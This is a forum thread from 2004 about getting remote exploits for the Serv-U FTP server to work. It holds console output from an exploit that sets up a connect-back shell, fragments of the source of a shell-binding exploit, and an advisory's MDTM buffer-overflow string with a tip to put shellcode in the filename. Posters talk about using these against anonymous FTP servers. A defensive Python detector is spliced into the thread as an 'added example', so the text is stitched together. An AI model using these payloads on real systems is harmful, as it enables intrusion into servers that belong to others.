I'll check this one out, the others just seem to kill the serv-u altogether. Hope this one shells a little better.
Reclone
Jan 28 2004, 01:44 PM
Just tested this one. Luckily it just kills servu
Krogoth
Jan 28 2004, 02:24 PM
yes, seen that on k-otik. gonna check this out.
studnikov
Jan 28 2004, 09:01 PM
Checked on one of my own servers running Serv-U 4.1 Pro:
C:\cygwin\home\>a -d ***.56.***.65 -p 22 -u **** -s ***** -w c:\ -H ***.13.***.105 -P 8888
[%] Serv-u v4.1.0.0 exploit [%]
/sbin/ifconfig: not found
grep: not found
gawk: not found
[.] if working you'll have a shell on ***.13.***.105:8888.
[.] launching attack on ftp://****:*****@***.56.***.65:22c:\
[.] setting up listener on port 8888..
[+] logged in.
[+] sending exploit..
550 /c:/???????????????????????????????????????????????????????????????????????? ???????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????3A♦¶hâúAIh?6-FPh<4$1ÿOòñ↓?--(nåÉ-_¥☼--_áå☼ÉA ifââÉ-☺ ÄÄÄÄOÄOÄ~?---AÅxÅùoyóâx-Ai?iF♣_N>Zÿ_"-'.↔Rü+Æ: No such file or directory .
C:\cygwin\home\>
Black Flag
Jan 30 2004, 01:16 AM
you need a writable directory...
phaeton
Jan 30 2004, 01:18 AM
did anyone actually get any of these to work? all the ones i have just crash servu
if (argc<5) {
    printf("Usage: %s IP PORT USERNAME PASSWORD [DIRECTORY]\n", argv[0]);
    exit(-1);
}
printf("- Serv-ME ----------------------------------------------------\n"
       " Serv-U v4.x \"site chmod\" exploit.\n"
       " Written by SkyLined <SkyLined@EduP.TUDelft.nl>.\n"
       " Credits for the vulnerability go to ICBM <icbm@0x557.net>.\n"
       " Thanks to H D Moore for the shellcode (www.metasploit.com).\n"
       " Greets to everyone at 0dd and #netric.\n"
       " (K)(L)(F) for Suzan.\n"
       "\n"
       " Binds a shell at %s:28876 if successfull.\n"
       " Tested with: v4.0.0.4, v4.1.0.0, v4.1.0.3 on W2K-EN.\n"
       "--------------------------------------------------------------\n", argv[1]);
Serv-U is an FTP daemon that runs on Windows. Serv-U supports an FTP command, "MDTM", for users to change a file's time. There is a buffer overflow when a logged-in user sends a malformed time zone as the MDTM argument. This can be exploited remotely to gain SYSTEM privilege.
Exploit:
When a user is logged in, he can send this:
MDTM 20031111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /test.txt
You must have a valid user account and password to exploit it, and you do not need WRITE or any other privilege. And even test.txt, which is the file you request, need not be there. :) So you can put your shellcode as the filename.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
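An added example, not part of the thread or the advisory: a check over FTP command lines that flags the malformed MDTM arguments the advisory describes. The accepted zone format (a sign plus up to four digits), the printable-path rule, the function names and the sample lines are assumptions constructed for illustration.

```python
import re

# Assumptions for this example (not from the thread): a legitimate zone suffix
# is a sign plus at most four digits, and file names are printable ASCII.
TZ_OK = re.compile(rb"[+-]\d{1,4}")
IS_MDTM = re.compile(rb"MDTM( |$)", re.IGNORECASE)
# Set form: MDTM <14-digit timestamp>[zone] <path>
SET_FORM = re.compile(rb"MDTM +(\d{14})(\S*)(?: +(.*))?", re.IGNORECASE | re.DOTALL)

def classify_mdtm(line: bytes) -> list:
    """Return the reasons one FTP command line looks like a malformed MDTM."""
    line = line.rstrip(b"\r\n")
    if not IS_MDTM.match(line):
        return []                      # some other FTP command
    reasons = []
    m = SET_FORM.fullmatch(line)
    if m:
        tz, path = m.group(2), m.group(3) or b""
        if tz and not TZ_OK.fullmatch(tz):
            reasons.append(f"malformed time zone ({len(tz)} bytes)")
    else:
        path = line[4:].strip()        # query form: MDTM <path>
    if any(b < 0x20 or b > 0x7E for b in path):
        reasons.append("non-printable bytes in file name")
    return reasons

def scan(lines):
    """Return (line_number, reasons) for every flagged command."""
    return [(n, r) for n, l in enumerate(lines, 1) if (r := classify_mdtm(l))]

# Constructed command lines, not captured traffic.
SAMPLE_LOG = [
    b"USER demo\r\n",
    b"MDTM /pub/readme.txt\r\n",
    b"MDTM 20031111111111+60 /pub/readme.txt\r\n",
    b"MDTM 20031111111111+" + b"A" * 40 + b" /test.txt\r\n",
    b"MDTM 20031111111111+0 /\x90\x90\xeb\x10\r\n",
]

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_LOG):
        print(f"line {n}: {'; '.join(reasons)}")
```

The same test can sit in a proxy or log watcher in front of the server; the advisory notes the requested file does not have to exist, so the check must run on the command itself, not on the server's reply.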
x1`
Feb 26 2004, 05:27 PM
so will this work with the anonymous ones and would u type anonymous anonymous for login and pass
brOmstar
Feb 26 2004, 05:30 PM
u need a valid account but this shouldn't be the problem with serv-U =)
Arnie
Feb 26 2004, 05:37 PM
ain't this just a DoS? well it crashed my serv-u but obviously with that command you won't get a shell
brOmstar
Feb 26 2004, 05:41 PM
???
QUOTE
This can be exploited remotely to gain SYSTEM privilege. ..... So you can put your shellcode as the filename.
Must be a remote exploitable one with possibility to insert shell i think
cecrex
Feb 26 2004, 11:01 PM
this shit just crashes the FTP.. is there any other version that works well?
nutschi
Feb 26 2004, 11:21 PM
and how can u protect yer servu now :|
WeeDMoNKeY
Feb 26 2004, 11:30 PM
i noticed this too, people would just scan for anonymous ftp's with serv-u running, can be some massive havoc happening.. its pretty simple actually, very good advisory.